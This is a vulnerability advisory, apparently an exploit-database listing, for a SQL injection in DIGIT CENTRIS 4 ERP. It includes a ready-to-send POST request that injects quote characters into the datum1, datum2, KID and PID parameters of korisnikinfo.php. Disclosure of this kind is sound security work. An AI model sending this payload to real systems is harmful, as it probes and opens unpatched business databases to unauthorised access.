DIGIT CENTRIS 4 ERP SQL Injection

2019.09.20
Credit: n1x_
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection # Date: 2019-09-19 # Exploit Author: n1x_ [MS-WEB] # Vendor Homepage: http://www.digit-rs.com/ # Product Homepage: http://digit-rs.com/centris.html # Version: Every version # CVE : N/A # Vulnerable parameters: datum1, datum2, KID, PID # [POST REQUEST] POST /korisnikinfo.php HTTP/1.1 Content-Length: 65 Content-Type: application/x-www-form-urlencoded Referer: http://host Host: host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* ListaPDF=Lista%20u%20PDF&datum1=1'"&datum2=01.01.2001'"&KID=1'"&PID=1'"


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top